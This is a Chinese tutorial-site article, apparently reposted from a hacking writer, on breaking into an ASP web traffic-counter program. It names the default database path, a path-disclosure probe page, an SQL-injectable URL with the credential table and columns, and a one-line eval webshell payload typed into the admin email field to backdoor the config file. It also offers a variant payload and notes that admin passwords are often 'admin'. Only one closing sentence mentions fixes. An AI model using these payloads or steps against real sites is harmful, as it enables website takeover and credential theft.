来源:自学PHP网 时间:2015-04-17 13:03 作者: 阅读:次
[导读] 一、默认数据库:counter/_db/db_CC_Counter6.mdb也可直接打开:http://www.2cto.com /Counter/utilities/update.asp查看源文件,查找! ,就可以找到数据库的地址。程序的问题。二、暴路径漏洞利用探针h...
一、默认数据库: counter/_db/db_CC_Counter6.mdb 也可直接打开:http://www.2cto.com /Counter/utilities/update.asp 查看源文件,查找<! ,就可以找到数据库的地址。程序的问题。 二、暴路径漏洞 利用探针http://www.2cto.com /Counter/utilities/aspSysCheck.asp,查看网站路径。 三、注入 存在用户注入,猜解出用户的帐号和密码,无法拿SHELL只可社工利用。 http://www.2cto.com /xxcount/core/default.asp?id=xxcnc 流量统计用户名是xxcnc,保存密码的表名是t_Site,用户名列是UID,密码列是PWD,登录页面(http://www.2cto.com /xxcount/supervise/login.asp) 四、后台插马 需要进后台,可插一句拿SHELL。不过大多说管理员密码都为admin,管理员密码并未保存在数据库中,在_inc/Common.asp中。 具体:进后台在管理信箱那把 cnhacker@263.net":eval request(chr(35))// 复制过去,,点击保存,看下_inc/common.asp的内容。 WebMasterEmail = "cnhacker@263.net\":eval request(chr(35))//" 嘿嘿来执行下,嘿嘿!成功了,统计程序中的后台拿将"转义成了\"所以这用了evalrequest(chr(35))嘿嘿,//是注释,:在asp中就是换行,前提就是你能进到后台,(好多后台管理密码都是admin嘿嘿)php也可以这样的嘿嘿,而且比asp利用的地方更多!需要动下配置语句的前后搭配好,利用好一些符号。 另注:黑防也有人提到了类似方法,可以写成9xiao"%><%eval request(chr(35))%><%',这个方法也比较巧妙,//和'在asp都是注释语句! by 逍遥复仇 www.2cto.com提供修方案: 注意修改默认路径和默认密码。加强过滤和验证。 |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com